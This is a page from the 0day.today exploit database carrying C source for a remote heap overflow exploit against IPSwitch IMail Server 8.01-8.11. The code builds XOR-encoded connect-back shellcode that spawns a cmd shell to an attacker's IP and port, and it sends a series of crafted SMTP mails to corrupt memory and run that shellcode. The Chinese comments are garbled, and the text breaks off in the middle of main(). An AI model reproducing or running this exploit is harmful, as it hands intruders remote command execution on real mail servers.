0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
IPSwitch IMail Server 8.0x Remote Heap Overflow Exploit
======================================================= IPSwitch IMail Server 8.0x Remote Heap Overflow Exploit ======================================================= /* by axis 2007-06-05 http://www.ph4nt0m.org Mail-List: http://list.ph4nt0m.org OOC°O?OazoO»zoimailµAexp PRIVATE Remote Exploit For IMAIL Smtp Server(1.2) This is For imail 8.01-8.11 version Usage:faint.exe -d <host> [options] Options: -d: Hostname to attack [Required] -t: Type [Default: 0] -p: Attack port [Default: 25] -S: the IP connect back to. -P: the port connect back to. Types: 0: win2k All version , IMail 8.01-11 ?»O?µAECAAI»ZoA??ZµA ?i?u?ZAE?Z?¬ ·C???AI?µAO»zoA©¶Z?? A©¶ZEC·?EuOUiaspam.dllAi loc_1001ada5 ==> ??Oa¶?I¬µ?EOE±?o??Oa?OOO»uO·µA?»I¬?? mov eax, [ebp+var_54] mov ecx, [eax+10c8h] push ecx ; char * mov edx, [ebp+var_54] mov eax, [edx+10d0h] push eax ; char * call _strcpy add esp, 8 jmp loc_1001a6f0 OaAistrcpyµAA?zobuffer?¬src?IdstµAOzOe?¬YOE»ECO±?OZO¶NAi¶A?oAZµA?? ¶oO®C°A»O??oEI?I?i?e EuOO·?EIzoOE??µ?·?In???¬SMDIA?? E»?oOU?a?oµA?«O?ZS?OO?OaA?zoµOO·?¬YI?EOO??±ZEIOa?O·uZ®µ?EIOaAUZ??? badcharEC 0x00 0x0a emmEµ»?O?zo 0x25,?»?yIOA»OOµ??? OOC°IoEIACzo·ZA¬µA°?±Y?¬ECAuOAAEz?zCpebAiµAOzOe?? OaOO·?·sOU2003EI?»AUOA?? OaAiIO?EOAAEemmµA·?·s?¬??OiAEO»zoOc?o OoI?imailsec.dllµA.data¶I?E?Z?? EuOOIOOOµ?AEOaAZO»zoµO·? 1000CB5D 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 1000CB60 50 PUSH EAX 1000CB61 8B0D 6C540310 MOV ECX,DWORD PTR DS:[1003546C] ; IMailsec.1003549C 1000CB67 51 PUSH ECX 1000CB68 8D95 FCFDFFFF LEA EDX,DWORD PTR SS:[EBP-204] 1000CB6E 52 PUSH EDX 1000CB6F FF15 F8D30210 CALL DWORD PTR DS:[<&USER32.wsprintfA>] ; USER32.wsprintfA ?aO?OzOeDWORD PTR DS:[1003546C] OUimailsec.dllµA.dataO??¬OazoµOO·?EOO±»IOACz?zC?? EuOOIOACYI?EOO??OiO»zoOc?o?? E?A·EcIA?? µUO»·aOE???? ·?EIshellcodeµ?AUZ?O?±?Z??A??OaAiIO·Aµ?AEtebO? µU¶?·aOE???? ·?EIOc?o?eO?µAz?zC?O·uZ®µ?AUZ?O?±?Z??A??OaAiIOO?·AOUAEtebO? µUEy·aOE???? z?zCimailsec.dllO?µA .data¶IµAOzOe?¬E?wsprintfAOi?EOc?o Oc?oz?zCE?OAµA?O·uZ®ECµU¶?·aOE??·?EI?yE?µA?¬z?zC?oµA·µ»OµOO·O±?OOzIoAEµUO»·aOE??·?EI?yE?µAshellcodeOUAUZ?O?µAµOO·?? EuOOOazoA©¶ZEC?I??IsI??OµA?????»?eO?EI?Iopcode???? OUEµ?EAuOAE±IO·?EIAE4·aOE???¬µUO»·aEC·IOE???¬OAOUIaz??E?SAE?? OEOU»?A?IoµAspam·?AA?¬EuOOµEµ?OE??·?In??ZSAiA©¶ZOE??E±?¬O??iONY�yAE?zzoOAAE?????? EuOO?i?AµA·?°zECE?OAdownload+exec µAshellcode?? OaAizo?oO»zo±E?IAAµA·ZA¬shellcode??I?poc?? YYemmEµOazoA©¶ZO»O±A»???¬O»ECz?°?±YA»O?AE?????? */ #include <stdio.h> #include <stdlib.h> #include <windows.h> #include <winsock.h> #include <io.h> #pragma comment (lib,"ws2_32") char *szEHLO = "HELO\r\n"; char *szMF = "MAIL FROM <fucker@fuckimail.org>\r\n"; char *szRCPT = "RCPT TO: <postmaster>\r\n"; char *szDATA = "DATA\r\n"; char *szTIME = "Date: Thu, 1 Oct 2007 07:06:09 +0800\r\n"; char *szMIME = "MIME\r\n"; char *szEND = ".\r\n"; char *szQUIT = "QUIT\r\n"; char *szCT = "Content-Type: multipart/boundary="; char *szCTE = "Content-Transfer-Encoding:"; //#define SCaddr "\x50\xe7\x03\x10" #define SCaddr "\x50\xc8\xfd\x7f" #define Fuck_ptr "\x6c\x54\x03\x10" //0x1003546c #define Teb_temp1 0x7ffdd050 #define Teb_temp2 0x7ffdd040 #define Teb_temp3 0x7ffdd030 unsigned short port = 25; unsigned char payload[5000] = ""; #define PROC_BEGIN __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90\ __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 #define PROC_END PROC_BEGIN unsigned char sh_Buff[2048]; unsigned int sh_Len; unsigned int Enc_key=0x99; //?aEµI??O?oO?,¶?I¬N°OO unsigned char decode1[] = /* 00401004 . /EB 0E JMP SHORT encode.00401014 00401006 $ |5B POP EBX 00401007 . |4B DEC EBX 00401008 . |33C9 XOR ECX,ECX 0040100A . |B1 FF MOV CL,0FF 0040100C > |80340B 99 XOR BYTE PTR DS:[EBX+ECX],99 00401010 .^|E2 FA LOOPD SHORT encode.0040100C 00401012 . |EB 05 JMP SHORT encode.00401019 00401014 > \E8 EDFFFFFF CALL encode.00401006 */ "\xEB\x0E\x5B\x4B\x33\xC9\xB1" "\xFF" // shellcode size "\x80\x34\x0B" "\xB8" // xor byte "\xE2\xFA\xEB\x05\xE8\xED\xFF\xFF\xFF"; unsigned char decode2[] = /* 00406030 /EB 10 JMP SHORT 00406042 00406032 |5B POP EBX 00406033 |4B DEC EBX 00406034 |33C9 XOR ECX,ECX 00406036 |66:B9 6601 MOV CX,166 0040603A |80340B 99 XOR BYTE PTR DS:[EBX+ECX],99 0040603E ^|E2 FA LOOPD SHORT 0040603A 00406040 |EB 05 JMP SHORT 00406047 00406042 \E8 EBFFFFFF CALL 00406032 */ "\xEB\x10\x5B\x4B\x33\xC9\x66\xB9" "\x66\x01" // shellcode size "\x80\x34\x0B" "\xB8" // xor byte "\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF"; // kernel32.dll functions index #define _LoadLibraryA 0x00 #define _CreateProcessA 0x04 //#define _ExitProcess 0x08 #define _ExitThread 0x08 #define _WaitForSingleObject 0x0C // ws2_32.dll functions index #define _WSASocketA 0x10 #define _connect 0x14 #define _closesocket 0x18 //#define _WSAStartup 0x1C // functions number #define _Knums 4 #define _Wnums 3 // Need functions unsigned char functions[100][128] = { // [esi] stack layout // kernel32 4 // 00 kernel32.dll {"LoadLibraryA"}, // [esi] {"CreateProcessA"}, // [esi+4] {"ExitThread"}, // [esi+8] //{"ExitProcess"}, //{"TerminateProcess"}, {"WaitForSingleObject"}, // [esi+12] // ws2_32 3 // 01 ws2_32.dll {"WSASocketA"}, // [esi+16] {"connect"}, // [esi+20] {"closesocket"}, // [esi+24] //{"WSAStartup"}, // [esi+28] {""}, }; void PrintSc(unsigned char *lpBuff, int buffsize); void ShellCode(); // Get function hash unsigned long hash(unsigned char *c) { unsigned long h=0; while(*c) { h = ( ( h << 25 ) | ( h >> 7 ) ) + *c++; } return h; } // get shellcode void GetShellCode(char* ipstr, short port) { char *fnbgn_str="\x90\x90\x90\x90\x90\x90\x90\x90\x90"; char *fnend_str="\x90\x90\x90\x90\x90\x90\x90\x90\x90"; unsigned char *pSc_addr; unsigned char pSc_Buff[2048]; unsigned int MAX_Sc_Len=0x2000; unsigned long dwHash[100]; unsigned int dwHashSize; unsigned int l,i,j,k; char *p; int ip; // Get functions hash for (i=0;;i++) { if (functions[i][0] == '\x0') break; dwHash[i] = hash(functions[i]); //fprintf(stderr, "%.8X\t%s\n", dwHash[i], functions[i]); } dwHashSize = i*4; // Deal with shellcode pSc_addr = (unsigned char *)ShellCode; for (k=0;k<MAX_Sc_Len;++k ) { if(memcmp(pSc_addr+k,fnbgn_str, 8)==0) { break; } } pSc_addr+=(k+8); // start of the ShellCode for (k=0;k<MAX_Sc_Len;++k) { if(memcmp(pSc_addr+k,fnend_str, 8)==0) { break; } } sh_Len=k; // length of the ShellCode memcpy(pSc_Buff, pSc_addr, sh_Len); for(k=0; k<sh_Len; ++k) { if(memcmp(pSc_Buff+k, "\x68\x7F\x00\x00\x01", 5) == 0) { ip = inet_addr(ipstr); p = (char*)&ip; pSc_Buff[k+1] = p[0]; pSc_Buff[k+2] = p[1]; pSc_Buff[k+3] = p[2]; pSc_Buff[k+4] = p[3]; } if(memcmp(pSc_Buff+k, "\x68\x02\x00\x00\x35", 5) == 0) { p = (char*)&port; pSc_Buff[k+3] = p[1]; pSc_Buff[k+4] = p[0]; } } // Add functions hash memcpy(pSc_Buff+sh_Len, (unsigned char *)dwHash, dwHashSize); sh_Len += dwHashSize; //printf("%d bytes shellcode\n", sh_Len); // print shellcode //PrintSc(pSc_Buff, sh_Len); // find xor byte for(i=0xff; i>0; i--) { l = 0; for(j=0; j<sh_Len; j++) { if ( // ((pSc_Buff[j] ^ i) == 0x26) || //% // ((pSc_Buff[j] ^ i) == 0x3d) || //= // ((pSc_Buff[j] ^ i) == 0x3f) || //? //((pSc_Buff[j] ^ i) == 0x40) || //@ ((pSc_Buff[j] ^ i) == 0x00) || //((pSc_Buff[j] ^ i) == 0x3c) || //((pSc_Buff[j] ^ i) == 0x3e) || // ((pSc_Buff[j] ^ i) == 0x2f) || // ((pSc_Buff[j] ^ i) == 0x22) || // ((pSc_Buff[j] ^ i) == 0x2a) || //((pSc_Buff[j] ^ i) == 0x3a) || // ((pSc_Buff[j] ^ i) == 0x20) || ((pSc_Buff[j] ^ i) == 0x25) || ((pSc_Buff[j] ^ i) == 0x0D) || ((pSc_Buff[j] ^ i) == 0x0A) // ((pSc_Buff[j] ^ i) == 0x5C) ) { l++; break; }; } if (l==0) { Enc_key = i; //printf("Find XOR Byte: 0x%02X\n", i); for(j=0; j<sh_Len; j++) { pSc_Buff[j] ^= Enc_key; } break; // break when found xor byte } } // No xor byte found if (l!=0){ //fprintf(stderr, "No xor byte found!\n"); sh_Len = 0; } else { //fprintf(stderr, "Xor byte 0x%02X\n", Enc_key); // encode if (sh_Len > 0xFF) { *(unsigned short *)&decode2[8] = sh_Len; *(unsigned char *)&decode2[13] = Enc_key; memcpy(sh_Buff, decode2, sizeof(decode2)-1); memcpy(sh_Buff+sizeof(decode2)-1, pSc_Buff, sh_Len); sh_Len += sizeof(decode2)-1; } else { *(unsigned char *)&decode1[7] = sh_Len; *(unsigned char *)&decode1[11] = Enc_key; memcpy(sh_Buff, decode1, sizeof(decode1)-1); memcpy(sh_Buff+sizeof(decode1)-1, pSc_Buff, sh_Len); sh_Len += sizeof(decode1)-1; } } } // print shellcode void PrintSc(unsigned char *lpBuff, int buffsize) { int i,j; char *p; char msg[4]; printf("/* %d bytes */\n",buffsize); for(i=0;i<buffsize;i++) { if((i%16)==0) if(i!=0) printf("\"\n\""); else printf("\""); sprintf(msg,"\\x%.2X",lpBuff[i]&0xff); for( p = msg, j=0; j < 4; p++, j++ ) { if(isupper(*p)) printf("%c", _tolower(*p)); else printf("%c", p[0]); } } printf( "\";\n"); } // ShellCode function void ShellCode() { __asm { PROC_BEGIN // C macro to begin proc jmp sc_end sc_start: pop edi // Hash string start addr (esp -> edi) // Get kernel32.dll base addr mov eax, fs:0x30 // PEB mov eax, [eax+0x0c] // PROCESS_MODULE_INFO mov esi, [eax+0x1c] // InInitOrder.flink lodsd // eax = InInitOrder.blink mov ebp, [eax+8] // ebp = kernel32.dll base address mov esi, edi // Hash string start addr -> esi // Get function addr of kernel32 push _Knums pop ecx get_kernel32: call GetProcAddress_fun loop get_kernel32 // Get ws2_32.dll base addr push 0x00003233 push 0x5f327377 push esp call dword ptr [esi+_LoadLibraryA] // LoadLibraryA("ws2_32"); //mov ebp, eax // ebp = ws2_32.dll base address xchg eax, ebp // Get function addr of ws2_32 push _Wnums pop ecx get_ws2_32: call GetProcAddress_fun loop get_ws2_32 // /* //LWSAStartup: sub esp, 400 push esp push 0x101 call dword ptr [esi+_WSAStartup] // WSAStartup(0x101, &WSADATA); // */ //LWSASocketA: push ecx push ecx push ecx push ecx push 1 push 2 call dword ptr [esi+_WSASocketA] // s=WSASocketA(2,1,0,0,0,0); //mov ebx, eax // socket -> ebx xchg eax, ebx //Lconnect: //int 3 push 0x0100007F // host: 127.0.0.1 push 0x35000002 // port: 53 mov ebp, esp push 0x10 // sizeof(sockaddr_in) push ebp // sockaddr_in address push ebx // socket s call dword ptr [esi+_connect] // connect(s, name, sizeof(name)); // if connect failed , exit test eax, eax jne Finished // xor eax, eax // allot memory for STARTUPINFO, PROCESS_INFORMATION mov edi, esp // zero out SI/PI push 0x12 pop ecx stack_zero: stosd loop stack_zero //mov byte ptr [esp+0x10], 0x44 // si.cb = sizeof(si) //inc byte ptr [esp+0x3C] // si.dwFlags //inc byte ptr [esp+0x3D] // si.wShowWindow //mov [esp+0x48], ebx // si.hStdInput = s //mov [esp+0x4C], ebx // si.hStdOutput = s //mov [esp+0x50], ebx // si.hStdError = s mov word ptr [esp+0x3c], 0x0101 xchg eax, ebx stosd stosd stosd mov edi, esp // push "cmd" push 0x00646d63 // "cmd" mov ebp, esp push eax // socket //LCreateProcess: lea eax, [edi+0x10] push edi // pi push eax // si push ecx // lpCurrentDirectory push ecx // lpEnvironment push ecx // dwCreationFlags push 1 // bInheritHandles push ecx // lpThreadAttributes push ecx // lpProcessAttributes push ebp // lpCommandLine = "cmd" push ecx // lpApplicationName NULL call dword ptr [esi+_CreateProcessA] // CreactProcessA(NULL,"CMD",0,0,1,0,0,0,si, pi); //LWaitForSingleObject: //push 1 push 0xFFFFFFFF push dword ptr [edi] call dword ptr [esi+_WaitForSingleObject] // WaitForSingleObject(Handle, time) ; //LCloseSocket: //push ebx call dword ptr [esi+_closesocket] // closesocket(c); Finished: // »OzZ??OiµAOc?oµa mov eax, 0x1003546c mov DWORD ptr [eax], 0x1003549c mov DWORD ptr [eax+4], 0x100354c8 mov DWORD ptr [eax+8], 0x100354e0 //push 1 //call dword ptr [esi+_ExitProcess] // ExitProcess(); xor eax, eax push eax call dword ptr [esi+_ExitThread] // GetProcAddress_fun: push ecx push esi mov esi, [ebp+0x3C] // e_lfanew mov esi, [esi+ebp+0x78] // ExportDirectory RVA add esi, ebp // rva2va push esi mov esi, [esi+0x20] // AddressOfNames RVA add esi, ebp // rva2va xor ecx, ecx dec ecx find_start: inc ecx lodsd add eax, ebp xor ebx, ebx hash_loop: movsx edx, byte ptr [eax] cmp dl, dh jz short find_addr ror ebx, 7 // hash key add ebx, edx inc eax jmp short hash_loop find_addr: cmp ebx, [edi] // compare to hash jnz short find_start pop esi // ExportDirectory // AddressOfNameOrdinals RVA /* //-------------------------------------------------------- jmp over_it __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 //-------------------------------------------------------- over_it: */ mov ebx, [esi+0x24] add ebx, ebp // rva2va mov cx, [ebx+ecx*2] // FunctionOrdinal mov ebx, [esi+0x1C] // AddressOfFunctions RVA add ebx, ebp // rva2va mov eax, [ebx+ecx*4] // FunctionAddress RVA add eax, ebp // rva2va stosd // function address save to [edi] pop esi pop ecx ret sc_end: call sc_start PROC_END //C macro to end proc } } // ripped from isno int Make_Connection(char *address,int port,int timeout) { struct sockaddr_in target; SOCKET s; int i; DWORD bf; fd_set wd; struct timeval tv; s = socket(AF_INET,SOCK_STREAM,0); if(s<0) return -1; target.sin_family = AF_INET; target.sin_addr.s_addr = inet_addr(address); if(target.sin_addr.s_addr==0) { closesocket(s); return -2; } target.sin_port = htons((short)port); bf = 1; ioctlsocket(s,FIONBIO,&bf); tv.tv_sec = timeout; tv.tv_usec = 0; FD_ZERO(&wd); FD_SET(s,&wd); connect(s,(struct sockaddr *)&target,sizeof(target)); if((i=select(s+1,0,&wd,0,&tv))==(-1)) { closesocket(s); return -3; } if(i==0) { closesocket(s); return -4; } i = sizeof(int); getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i); if((bf!=0)||(i!=sizeof(int))) { closesocket(s); return -5; } ioctlsocket(s,FIONBIO,&bf); return s; } void Disconnect(SOCKET s) { closesocket(s); WSACleanup(); } void help(char *n) { printf("==Usage:\n"); printf("%s [target ip] [target port] [local ip] [local port]\n\n", n); printf("We will send 4 mail to trigger the vuln.\n"); printf("The fucking vuln will be triggered when the mail server handling the mail.\n"); printf("Because of the Spam in the internet,\nthe vuln maybe triggered after a few days!!Fuck!!\n\n"); } int sendfuckingmail(int the_mail, char *target, int tg_port) { SOCKET s; WSADATA WSAData; char buffer[1000] = {0}; // AUE±bufferOAOUio int ret; char padding[5000] = {0}; // paddingOAOUIi?a if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0) { fprintf(stderr, "[-] WSAStartup failed.\n"); WSACleanup(); exit(1); } s = Make_Connection(target, tg_port, 10); if(s<0) { fprintf(stderr, "[-] connect err.\n"); exit(1); } recv(s, buffer, sizeof(buffer), 0); Sleep(1000); ret = strlen(buffer); if ( ret < 10 ) { printf("[-]Seems Service Down~ :( \n"); Disconnect(s); return -1; } printf("[+]Got Banner: %s", buffer); // HELO send(s, szEHLO, strlen(szEHLO), 0); recv(s, buffer, sizeof(buffer), 0); // printf("%s", buffer); printf("[+]Say hello to Server.\n"); memset(buffer, 0, sizeof(buffer)); // MAIL FROM Sleep(500); send(s, szMF, strlen(szMF), 0); recv(s, buffer, sizeof(buffer), 0); if(strstr(buffer, "250")) printf("[+]Recv: %s", buffer); else { printf("[-]Seems Service Down~ :( \n"); Disconnect(s); return -1; } memset(buffer, 0, sizeof(buffer)); // RCPT TO Sleep(500); send(s, szRCPT, strlen(szRCPT), 0); recv(s, buffer, sizeof(buffer), 0); if(strstr(buffer, "250")) printf("[+]Recv: %s", buffer); else { printf("[-]Seems Service Down~ :( \n"); Disconnect(s); return -1; } memset(buffer, 0, sizeof(buffer)); // DATA Sleep(500); send(s, szDATA, strlen(szDATA), 0); recv(s, buffer, sizeof(buffer), 0); if(strstr(buffer, "354")) printf("[+]Recv: %s", buffer); else { printf("[-]Seems Service Down~ :( \n"); Disconnect(s); return -1; } memset(buffer, 0, sizeof(buffer)); Sleep(100); // TIME send(s, szTIME, strlen(szTIME), 0); // recv(s, buffer, sizeof(buffer), 0); // printf("%s", buffer); printf("[+]Fucking Server at %s", szTIME); memset(buffer, 0, sizeof(buffer)); Sleep(200); // A?¶IECµU?z·aOE?? if (the_mail == 0) // ·?O»·a·IOE???¬Iaz??E?SAE { /* my $padding = "\x22"."B"x2028; my $padding1 = "B"x2046; my $padding11 = "B"x146; #163zoB my $straddr1 = "\x50\xd0\xfd\x7f"."\x30\xd0\xfd\x7f"; # OUtebO? my $straddr2 = "\x50\xc0\xfd\x7f"; # shellcode»a??±Zµ?µAµOO· print $sock "Content-Type: multipart\/boundary=$padding $padding1 $padding11$straddr1$straddr2\r\n"; */ memcpy(payload, szCT, strlen((const char *)szCT)); //memcpy(payload+strlen(const char *szCT), "\"", 1); memset(padding, 0x43, 5000); padding[0] = '\x22'; padding[2029] = '\x20'; padding[4076] = '\x20'; //straddr1 padding[4223] = '\x50'; padding[4224] = '\xd0'; padding[4225] = '\xfd'; padding[4226] = '\x7f'; padding[4227] = '\x30'; padding[4228] = '\xd0'; padding[4229] = '\xfd'; padding[4230] = '\x7f'; //straddr2 0x10036ea0 padding[4231] = '\x30'; padding[4232] = '\xd8'; padding[4233] = '\xfd'; padding[4234] = '\x7f'; padding[4235] = '\x0d'; padding[4236] = '\x0a'; padding[4237] = '\x00'; memcpy(payload+strlen((const char *)szCT), padding, strlen((const char *)padding)); send(s, (const char *)payload, strlen((const char *)payload), 0); Sleep(100); // MIME send(s, (const char *)szMIME, strlen((const char *)szMIME), 0); // recv(s, buffer, sizeof(buffer), 0); // printf("%s", buffer); // printf("[+]Fucking Server at %s.\n", szTIME); // memset(buffer, 0, sizeof(buffer)); //print $sock "Content-Transfer-Encoding:$padding2\r\n"; memset(padding, 0x43, 80); //memcpy(padding, "\x43", 80); padding[80] = '\x00'; memset(payload, 0x00, sizeof(payload)); memcpy(payload, szCTE, strlen((const char*)szCTE)); memcpy(payload+strlen((const char*)szCTE), padding, strlen((const char*)padding)); memcpy(payload+strlen((const char*)szCTE)+strlen((const char*)padding), "\r\n", 2); Sleep(200); send(s, (const char *)payload, strlen((const char *)payload), 0); memset(payload, 0x00, sizeof(payload)); } else if (the_mail == 1) // ??OibufferoverflowµAz?zC?O·uZ® { /* my $padding = "\x22"."B"x2028; my $padding1 = "B"x2046; my $padding11 = "B"x146; #163zoB my $straddr1 = "\x50\xd0\xfd\x7f"."\x30\xd0\xfd\x7f"; # OUtebO? my $straddr2 = "\x50\xc0\xfd\x7f"; # shellcode»a??±Zµ?µAµOO· print $sock "Content-Type: multipart\/boundary=$padding $padding1 $padding11$straddr1$straddr2\r\n"; */ memcpy(payload, szCT, strlen((const char *)szCT)); //memcpy(payload+strlen(const char *szCT), "\"", 1); memset(padding, 0x43, 5000); padding[0] = '\x22'; padding[2029] = '\x20'; padding[4076] = '\x20'; //straddr1 padding[4223] = '\x50'; padding[4224] = '\xd0'; padding[4225] = '\xfd'; padding[4226] = '\x7f'; padding[4227] = '\x30'; padding[4228] = '\xd0'; padding[4229] = '\xfd'; padding[4230] = '\x7f'; //straddr2 0x10036ea0 padding[4231] = '\x50'; padding[4232] = '\xc0'; padding[4233] = '\xfd'; padding[4234] = '\x7f'; padding[4235] = '\x0d'; padding[4236] = '\x0a'; padding[4237] = '\x00'; memcpy(payload+strlen((const char *)szCT), padding, strlen((const char *)padding)); send(s, (const char *)payload, strlen((const char *)payload), 0); Sleep(100); // MIME send(s, (const char *)szMIME, strlen((const char *)szMIME), 0); // recv(s, buffer, sizeof(buffer), 0); // printf("%s", buffer); // printf("[+]Fucking Server at %s.\n", szTIME); // memset(buffer, 0, sizeof(buffer)); //print $sock "Content-Transfer-Encoding:$padding2\r\n"; memset(padding, 0x43, 80); //memcpy(padding, "\x43", 80); padding[80] = '\x00'; memset(payload, 0x00, sizeof(payload)); memcpy(payload, szCTE, strlen((const char*)szCTE)); memcpy(payload+strlen((const char*)szCTE), padding, strlen((const char*)padding)); memcpy(payload+strlen((const char*)szCTE)+strlen((const char*)padding), "\r\n", 2); Sleep(200); send(s, (const char *)payload, strlen((const char *)payload), 0); // send payload ??OiOc?oµA?O·uZ® eipOzIoshellcodeµAµOO· memset(payload, 0x00, sizeof(payload)); memset(payload, 0x44, 520); memcpy(payload+520, SCaddr, strlen((const char *)SCaddr)); memcpy(payload+520+4, "\r\n", 2); Sleep(200); send(s, (const char *)payload, strlen((const char *)payload), 0); memset(payload, 0x00, sizeof(payload)); } else if (the_mail == 2) // ·?EIshellcode { /* my $padding = "\x22"."B"x2028; my $padding1 = "B"x2046; my $padding11 = "B"x146; #163zoB my $straddr1 = "\x50\xd0\xfd\x7f"."\x30\xd0\xfd\x7f"; # OUtebO? my $straddr2 = "\x50\xe7\x03\x10"; # shellcode»a??±Zµ?µAµOO· print $sock "Content-Type: multipart\/boundary=$padding $padding1 $padding11$straddr1$straddr2\r\n"; */ memcpy(payload, szCT, strlen((const char *)szCT)); //memcpy(payload+strlen(const char *szCT), "\"", 1); memset(padding, 0x43, 5000); padding[0] = '\x22'; padding[2029] = '\x20'; padding[4076] = '\x20'; //straddr1 padding[4223] = '\x50'; padding[4224] = '\xd0'; padding[4225] = '\xfd'; padding[4226] = '\x7f'; padding[4227] = '\x30'; padding[4228] = '\xd0'; padding[4229] = '\xfd'; padding[4230] = '\x7f'; //straddr2 0x7ffdc850 padding[4231] = '\x50'; padding[4232] = '\xc8'; padding[4233] = '\xfd'; padding[4234] = '\x7f'; padding[4235] = '\x0d'; padding[4236] = '\x0a'; padding[4237] = '\x00'; memcpy(payload+strlen((const char *)szCT), padding, strlen((const char *)padding)); send(s, (const char *)payload, strlen((const char *)payload), 0); // MIME send(s, (const char *)szMIME, strlen((const char *)szMIME), 0); // recv(s, buffer, sizeof(buffer), 0); // printf("%s", buffer); // printf("[+]Fucking Server at %s.\n", szTIME); // memset(buffer, 0, sizeof(buffer)); //print $sock "Content-Transfer-Encoding:$padding2\r\n"; memset(padding, 0x43, 80); //memcpy(padding, "\x43", 80); padding[80] = '\x00'; memset(payload, 0x00, sizeof(payload)); memcpy(payload, szCTE, strlen((const char*)szCTE)); memcpy(payload+strlen((const char*)szCTE), padding, strlen((const char*)padding)); memcpy(payload+strlen((const char*)szCTE)+strlen((const char*)padding), "\r\n", 2); send(s, (const char *)payload, strlen((const char *)payload), 0); Sleep(200); // ·?EIshellcode?yE?±?Z? memset(payload, 0x00, sizeof(payload)); memcpy(payload, sh_Buff, strlen((const char*)sh_Buff)); memcpy(payload+strlen((const char*)sh_Buff), "\r\n", 2); send(s, (const char *)payload, strlen((const char *)payload), 0); memset(payload, 0x00, sizeof(payload)); } else // µUEy·aOE???¬??OiOc?o { Sleep(500); // OoI?O?Z?·?A©¶ZAE?¬EuOO±O?eO?Iiµa?¬?»E»shellcodeA»µ?I» /* my $padding = "\x22"."B"x2028; my $padding1 = "B"x2046; my $padding11 = "B"x146; #163zoB my $straddr1 = "\x50\xd0\xfd\x7f"."\x30\xd0\xfd\x7f"; # OUtebO? my $straddr2 = "\x6c\x54\x03\x10"; # shellcode»a??±Zµ?µAµOO· print $sock "Content-Type: multipart\/boundary=$padding $padding1 $padding11$straddr1$straddr2\r\n"; */ memcpy(payload, szCT, strlen((const char *)szCT)); //memcpy(payload+strlen(const char *szCT), "\"", 1); memset(padding, 0x43, 5000); padding[0] = '\x22'; padding[2029] = '\x20'; padding[4076] = '\x20'; //straddr1 padding[4223] = '\x50'; padding[4224] = '\xd0'; padding[4225] = '\xfd'; padding[4226] = '\x7f'; padding[4227] = '\x30'; padding[4228] = '\xd0'; padding[4229] = '\xfd'; padding[4230] = '\x7f'; //straddr2 Z?·?Oc?oµAµOO· padding[4231] = '\x6c'; padding[4232] = '\x54'; padding[4233] = '\x03'; padding[4234] = '\x10'; padding[4235] = '\x0d'; padding[4236] = '\x0a'; padding[4237] = '\x00'; memcpy(payload+strlen((const char *)szCT), padding, strlen((const char *)padding)); send(s, (const char *)payload, strlen((const char *)payload), 0); // MIME send(s, (const char *)szMIME, strlen((const char *)szMIME), 0); // recv(s, buffer, sizeof(buffer), 0); // printf("%s", buffer); // printf("[+]Fucking Server at %s.\n", szTIME); // memset(buffer, 0, sizeof(buffer)); //print $sock "Content-Transfer-Encoding:$padding2\r\n"; memset(padding, 0x43, 80); //memcpy(padding, "\x43", 80); padding[80] = '\x00'; memset(payload, 0x00, sizeof(payload)); memcpy(payload, szCTE, strlen((const char*)szCTE)); memcpy(payload+strlen((const char*)szCTE), padding, strlen((const char*)padding)); memcpy(payload+strlen((const char*)szCTE)+strlen((const char*)padding), "\r\n", 2); send(s, (const char *)payload, strlen((const char *)payload), 0); Sleep(200); // send payload ??zAOzOeµOO·?¬??Oi?oOc?o memset(payload, 0x00, sizeof(payload)); // ?eO?OzIo??OiOc?o?O·uZ®µAµOO·?¬OO?°2zo?E?ZµOO· memcpy(payload, "\x50\xc0\xfd\x7f", 4); memcpy(payload+4, "\x40\xc0\xfd\x7f\x30\xc0\xfd\x7f", 8); memcpy(payload+12, "\r\n", 2); send(s, (const char *)payload, strlen((const char *)payload), 0); memset(payload, 0x00, sizeof(payload)); } // END Sleep(500); send(s, szEND, strlen(szEND), 0); recv(s, buffer, sizeof(buffer), 0); if(strstr(buffer, "250")) printf("[+]Recv: %s", buffer); else { printf("[-]Seems Service Down~ :( \n"); Disconnect(s); return -1; } memset(buffer, 0, sizeof(buffer)); // QUIT send(s, szQUIT, strlen(szQUIT), 0); recv(s, buffer, sizeof(buffer), 0); // printf("%s", buffer); printf("[+]Fucking END, Ejaculating Now !\n\n"); memset(buffer, 0, sizeof(buffer)); Sleep(400); closesocket(s); WSACleanup(); return 0; } int main(int argc, char *argv[]) { //int imail_ver = 0; //imail version (buffer?»I¬) //int ret; //SOCKET s; //WSADATA WSAData; printf("\n== IMail iaspam.dll 8.01-8.11 Private Remote Exploit\n"); printf("== by axis@ph4nt0m\n"); printf("== http://www.ph4nt0m.org\n"); printf("== 2007-06\n"); printf("== 2007-09-18 published as a gift for the 6th Anniversary of Ph4nt0m\n"); printf("== ConnBack Version\n"); printf("== Thanks EnvyMask@ph4nt0m\n\n"); if(argc != 5) { help(argv[0]); return 0; } if(argc == 5) port = atoi(argv[4]); GetShellCode(argv[3], port); if 